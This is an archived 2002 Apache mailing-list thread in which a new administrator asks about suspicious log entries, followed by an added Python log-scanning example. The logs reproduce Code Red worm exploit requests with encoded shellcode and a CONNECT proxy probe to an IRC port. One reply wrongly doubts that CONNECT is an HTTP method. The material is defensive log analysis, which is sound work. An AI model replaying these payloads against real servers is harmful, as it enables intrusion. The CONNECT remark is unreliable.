Posted to users@httpd.apache.org by Gary Turner <kk...@swbell.net> on 2002/07/11 10:38:34 UTC
access & error logs -- attempted crack?
Notice the access and error log excerpts. Being brand new to this, I
can only wonder what this is all about. Are they innocent (unlikely, I
think) or attempts to get into my box? Note the one reference to port
6667. Was this a try at using me for chat relay/misdirection?
Any explanation of these log entries will be deeply appreciated.
==========================================================
From the access.log
61.59.67.62 - - [10/Jul/2002:19:50:28 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
200.165.231.85 - - [10/Jul/2002:20:29:46 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
HTTP/1.0" 405 307 "-" "-"
62.248.37.51 - - [11/Jul/2002:02:38:23 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
(notice 207.114.6.10 --> connect 207.114.6.11:6667)
===============================================================
From the error.log
[Wed Jul 10 08:14:56 2002] [error] [client 65.29.2.20] Client sent
malformed Host header
[Wed Jul 10 19:50:28 2002] [error] [client 61.59.67.62] Client sent
malformed Host header
[Wed Jul 10 20:29:46 2002] [error] [client 200.165.231.85] Client sent
malformed Host header
[Thu Jul 11 02:38:23 2002] [error] [client 62.248.37.51] Client sent
malformed Host header
--
gt
It ain't so much what you don't know that gets you in trouble---
it's what you do know that ain't so.--unk
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: access & error logs -- attempted crack?
Posted by Robert Andersson <ro...@profundis.nu>.
Sorry for not replying sooner. The 6667 stuff does really puzzle me, and I
doubt I will be able to give you any answer.
What we see is that something (on 207.114.6.10) connected to yourip:80 and
sent Apache a request like:
"CONNECT 207.114.6.11:6667 HTTP/1.0"
where you would normally see something like:
"GET /folder/file.html HTTP/1.1"
Apache naturally responds with a 405 - Method Not Allowed, where the method
would be "CONNECT". I really have no idea why anyone would be doing this,
but I'm somewhat sure it has nothing to do with the other (CodeRed) log
lines. I don't think there is a CONNECT method in the HTTP standard; I'm not
certain but almost. I should go look it up, but too lazy right now ;-).
Anyway, I don't think you need to worry about that one either.
Regards,
Robert Andersson
----- Original Message -----
From: "Gary Turner" <kk...@swbell.net>
To: <us...@httpd.apache.org>; "Robert Andersson" <ro...@profundis.nu>
Sent: Thursday, July 11, 2002 9:35 PM
Subject: Re: access & error logs -- attempted crack?
Re: access & error logs -- attempted crack?
Posted by Gary Turner <kk...@swbell.net>.
On Thu, 11 Jul 2002 10:44:43 +0200, Robert Andersson wrote:
>Looks like CodeRed or similar clone, which tries to exploit a buffer overflow
>in MS IIS. It's now known that Apache (<1.3.26 && <2.0.39) has a similar
>bug, but I don't know what such an attack would look like. But these log
>entries are certainly intended for IIS.
Thanks to both Robert and Stephen for timely, helpful answers. I knew
there was a reason to run Linux :)
On the other access.log entry,
207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
HTTP/1.0" 405 307 "-" "-"
can anyone explain this? IRC port?
--
gt
It ain't so much what you don't know that gets you in trouble---
it's what you do know that ain't so.--unk
Re: access & error logs -- attempted crack?
Posted by Robert Andersson <ro...@profundis.nu>.
Looks like CodeRed or similar clone, which tries to exploit a buffer overflow
in MS IIS. It's now known that Apache (<1.3.26 && <2.0.39) has a similar
bug, but I don't know what such an attack would look like. But these log
entries are certainly intended for IIS.
Regards,
Robert Andersson
----- Original Message -----
From: "Gary Turner" <kk...@swbell.net>
To: "Apache Users" <us...@httpd.apache.org>
Sent: Thursday, July 11, 2002 10:38 AM
Subject: access & error logs -- attempted crack?
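An added example, not from anyone in the thread, that does by script what Robert's two replies do by eye: it parses Apache access and error log lines, labels `GET /default.ida?...%u...` hits as Code Red probes and `CONNECT host:port` requests as proxy probes, and joins each access entry to the error log by client IP and second, which is how you confirm that the 400s on the Code Red hits are the "malformed Host header" errors. The sample lines are constructed from the thread with the N-run shortened; 198.51.100.7 is a made-up benign hit.

```python
import re
from datetime import datetime
# Apache "combined" access log and 1.3-era error log formats, as in the thread.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^ \]]+) [^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
ERROR_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>\S+)\] (?P<msg>.*)$')

# Constructed samples: the thread's two probes (Code Red N-run shortened) plus a made-up benign hit.
ACCESS_LOG = """\
61.59.67.62 - - [10/Jul/2002:19:50:28 -0500] "GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 400 328 "-" "-"
207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667 HTTP/1.0" 405 307 "-" "-"
198.51.100.7 - - [11/Jul/2002:03:00:00 -0500] "GET /folder/file.html HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
"""
ERROR_LOG = """\
[Wed Jul 10 19:50:28 2002] [error] [client 61.59.67.62] Client sent malformed Host header
"""

def classify(method, target, status):
    """Label one request; a 2xx on CONNECT would mean Apache actually tunnelled it."""
    t = target.lower()
    if method == "GET" and t.startswith("/default.ida?") and "%u" in t:
        return "codered"      # IIS .ida overflow payload; Apache just rejects it
    if method == "CONNECT" and re.fullmatch(r"[^:]+:\d+", target):
        return "proxy-abused" if status.startswith("2") else "proxy-probe"
    return "normal"

def error_index(error_log):
    """Map (client ip, timestamp) -> error message so access hits can be joined."""
    idx = {}
    for line in error_log.splitlines():
        m = ERROR_RE.match(line)
        if m:
            idx[(m["ip"], datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"))] = m["msg"]
    return idx

def scan(access_log, error_log):
    """One finding per access line: ip, label, status and the error-log line logged
    for the same client in the same second (None when there is none)."""
    errors = error_index(error_log)
    findings = []
    for m in filter(None, map(ACCESS_RE.match, access_log.splitlines())):
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S")   # local time, tz dropped
        findings.append({"ip": m["ip"], "status": int(m["status"]),
                         "label": classify(m["method"], m["target"], m["status"]),
                         "error": errors.get((m["ip"], ts))})
    return findings

if __name__ == "__main__":
    for finding in scan(ACCESS_LOG, ERROR_LOG):
        print(finding)
```

On a real server, pass the contents of access_log and error_log to scan(); only a "proxy-abused" finding would mean the CONNECT request was actually served.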